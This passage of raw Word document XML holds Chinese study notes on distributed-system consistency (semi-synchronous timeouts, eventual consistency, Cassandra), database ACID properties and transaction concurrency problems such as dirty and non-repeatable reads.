        <w:t>这里的半同步系统指每个节点存在一个时钟，这些时钟不需要同步，但是按照相同的速率流逝。更通俗的来说，就是一个能够实现超时机制的系统。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>举个例子，系统可以把这个数据只放在一个节点上，其他节点收到请求后向这个节点读或写数据，并设置一个定时器，如果超时前得到结果，那么返回这个结果，否则返回失败。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更进一步的，也是最重要的，实现一个满足最终一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Eventually Consistency) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的系统是可行的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>现实中的一个例子是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cassandra </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004558AC" w:rsidRDefault="004558AC" w:rsidP="004558AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRDefault="009C3372" w:rsidP="004558AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRDefault="009C3372" w:rsidP="00A051A9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>事务的ACID属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="54" w:after="54" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1. 原子性（Atomicity）</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>原子性是指事务是一个不可分割的工作单位，事务中的操作要么都发生，要么都不发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2. 一致性（Consistency）</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>事务必须使数据库从一个一致性状态变换到另外一个一致性状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>3. 隔离性（Isolation）</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>事务的隔离性是指一个事务的执行不能被其他事务干扰，即一个事务内部的操作及使用的数据对并发的其他事务是隔离的，并发执行的各个事务之间不能互相干扰。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="009C3372">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>4. 持久性（Durability）</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3372">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>持久性是指一个事务一旦被提交，它对数据库中数据的改变就是永久性的，接下来的其他操作和数据库故障不应该对其有任何影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3372" w:rsidRPr="009C3372" w:rsidRDefault="009C3372" w:rsidP="004558AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00691C86" w:rsidRPr="00F41A4C" w:rsidRDefault="00691C86" w:rsidP="00691C86">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库隔离级别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00F41A4C" w:rsidRDefault="004E7355" w:rsidP="004E7355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="00B006C4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于同时运行的多个事务</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当这些事务访问数据库中相同的数据时</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有采取必要的隔离机制</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会导致各种</w:t>
      </w:r>
      <w:r w:rsidRPr="004B20DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>并发问题</w:t>
      </w:r>
      <w:r w:rsidRPr="004B20DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脏读</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于两个事物</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1, T2, T1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取了已经被</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新但还没有被提交的字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回滚</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, T1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取的内容就是临时且无效的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可重复读</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于两个事物</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1, T2, T1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取了一个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新了该字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, T1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次读取同一个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值就不同了</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>幻读</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于两个事物</w:t>
